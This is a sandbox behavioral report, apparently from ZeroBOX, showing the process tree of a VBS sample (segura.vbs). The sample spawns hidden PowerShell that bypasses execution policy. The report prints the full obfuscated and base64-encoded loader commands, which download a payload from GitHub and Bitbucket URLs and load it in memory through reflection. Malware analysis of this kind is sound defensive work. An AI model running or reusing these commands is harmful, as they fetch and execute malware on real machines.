| ZeroBOX

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\segura.vbs

    2532
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9dXJsJysnID0gezJ9aHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXMnKydlcmNvbicrJ3QnKydlbnQuY29tL04nKydvJysnRCcrJ2V0JysnZWN0T24nKycvTm9EZScrJ3RlY3RPJysnbi9yZWYnKydzJysnLycrJ2gnKydlJysnYScrJ2RzL21haW4nKycvRGV0YWhOb3RoLVYnKycudHh0ezJ9JysnOyB7MX1iJysnYXMnKydlJysnNjQnKydDb250ZScrJ250JysnID0gJysnKE5ldy1PYmplY3QnKycgU3knKydzdGVtLicrJ05ldC4nKydXZWJDbGllJysnbnQpLkRvJysnd24nKydsb2FkU3RyaScrJ24nKydnKHsxfXVyJysnbCk7JysnICcrJ3sxJysnfWJpbicrJ2EnKydyeUNvbnQnKydlbnQnKycgJysnPScrJyBbU3knKydzdCcrJ2VtLkMnKydvbicrJ3YnKydlJysncnRdJysnOjpGcicrJ29tQmFzJysnZTY0U3RyaScrJ25nKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnOycrJyB7MScrJ31hc3NlbWJsJysneScrJyA9IFtSZWZsZWN0JysnaW9uJysnLkEnKydzc2VtYmwnKyd5XScrJzonKyc6JysnTG9hZCh7MX1iaW5hcicrJ3lDb250ZScrJ250KTsnKycgW2RubCcrJ2knKydiLkknKydPJysnLkgnKydvbWVdJysnOjpWQUkoezB9dHh0LkpOcmFUL3NkYW9sJysnbicrJ3dvZC8ycmF0L2YnKydhc2ZzJysnYWZzbHNkcycrJ2RsdmV1bi8nKydncicrJ28udGUnKydrYycrJ3VidGliLycrJy86c3B0dGh7MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sICcrJ3snKycwfWQnKydlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZCcrJ297MH0sICcrJ3snKycwfWFzcCcrJ25ldF9yZScrJ2dzcWx7JysnMCcrJ30nKycsICcrJ3swfScrJ3swfSx7MH17MH0nKycpJykgLWZbY0hBcl0zNCxbY0hBcl0zNixbY0hBcl0zOSl8ICYoICRQc0hPTWVbMjFdKyRQc2hPbWVbMzRdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

      2616
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}url'+' = {2}https://'+'ra'+'w.'+'githubus'+'ercon'+'t'+'ent.com/N'+'o'+'D'+'et'+'ectOn'+'/NoDe'+'tectO'+'n/ref'+'s'+'/'+'h'+'e'+'a'+'ds/main'+'/DetahNoth-V'+'.txt{2}'+'; {1}b'+'as'+'e'+'64'+'Conte'+'nt'+' = '+'(New-Object'+' Sy'+'stem.'+'Net.'+'WebClie'+'nt).Do'+'wn'+'loadStri'+'n'+'g({1}ur'+'l);'+' '+'{1'+'}bin'+'a'+'ryCont'+'ent'+' '+'='+' [Sy'+'st'+'em.C'+'on'+'v'+'e'+'rt]'+'::Fr'+'omBas'+'e64Stri'+'ng({'+'1}base64Cont'+'ent)'+';'+' {1'+'}assembl'+'y'+' = [Reflect'+'ion'+'.A'+'ssembl'+'y]'+':'+':'+'Load({1}binar'+'yConte'+'nt);'+' [dnl'+'i'+'b.I'+'O'+'.H'+'ome]'+'::VAI({0}txt.JNraT/sdaol'+'n'+'wod/2rat/f'+'asfs'+'afslsds'+'dlveun/'+'gr'+'o.te'+'kc'+'ubtib/'+'/:sptth{0}, {0}desativado{0'+'}, '+'{'+'0}d'+'es'+'ativado{0}, {0}desativad'+'o{0}, '+'{'+'0}asp'+'net_re'+'gsql{'+'0'+'}'+', '+'{0}'+'{0},{0}{0}'+')') -f[cHAr]34,[cHAr]36,[cHAr]39)| &( $PsHOMe[21]+$PshOme[34]+'x')"

        2760

Process contents

No process loaded Click on a process in the tree above to load its data.